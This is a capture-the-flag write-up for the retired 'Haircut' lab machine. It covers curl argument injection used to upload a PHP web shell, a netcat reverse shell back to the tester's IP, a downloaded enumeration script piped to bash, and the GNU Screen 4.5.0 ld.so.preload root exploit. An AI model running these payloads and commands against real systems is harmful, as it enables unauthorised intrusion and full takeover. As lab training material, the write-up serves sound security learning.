This is the write-up for the box Haircut that got retired at the 30th September 2017. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.24 haircut.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/haircut.nmap 10.10.10.24
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
On the web page there is a photo of a person and nothing interesting in the source. Lets search for hidden paths and PHP files with Gobuster:
gobuster -u http://10.10.10.24/ -w dir /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
The responses are the path /uploads with HTTP Code 403 Forbidden, a page /test.html, where its a picture of hair and /exposed.php where we see this:
When clicking on Go, it gets back the test.html site. If we start a web server and input the IP of our server in there it tries to connect to us.
Trying special characters like semicolon and pipes get filtered with a warning, that those characters can't be used.
By inputting anything into the field, it displays an error from curl
:
This means that this application sends a curl
command to get the files.
Lets send this to Burpsuites Repeater to try some things with cURL.
We can try to put parameters of cURL in there:
formurl=--version&submit=Go
This works and displays the version number of cURL, so lets try to upload something on the /uploads directory with it.
formurl=-o uploads/test.html http://10.10.14.23:8000/test.html&submit=Go
Requesting the test.html file we get it back, so we can upload a PHP file to get command execution. The web shell shell.php file I will upload has this code in it:
<?php echo system($_REQUEST['cmd']); ?>
Now we can request the file with the command whoami
to test it:
GET /uploads/shell.php?cmd=whoami HTTP/1.1
This works and it is possible to send a command to start a reverse shell on the box.
GET /uploads/shell.php?cmd=nc -e /bin/sh 10.10.14.23 9001 HTTP/1.1
We are on the box as www-data.
Now executing any Linux enumeration script to get an attack surface:
wget http://10.10.14.23:8000/LinEnum.sh | bash
Looking for binaries with the Setuid bit enabled:
find / -perm -4000 2>/dev/null | xargs ls -la
The binay screen
has the setuid bit set and explicitly the version number 4.5.0 displayed which has a privilege escalation vulnerability. The explanation for this exploit can be found through searchsploit screen
on the GNU Screen 4.5.0 - Local Privilege Escalation (PoC) exploit.
For this we need to create some files first. They are in this folder.
- libhax.c:
- rootshell.c
Compiling the code:
gcc rootshell.c -o rootshell
gcc -fPIC -shared -ldl -o libhax.so libhax.c
This created the Shared object file libhax.so and the binary rootshell.
Executing these commands one after another and in the end executing the rootshell binary:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
This will start a shell as root!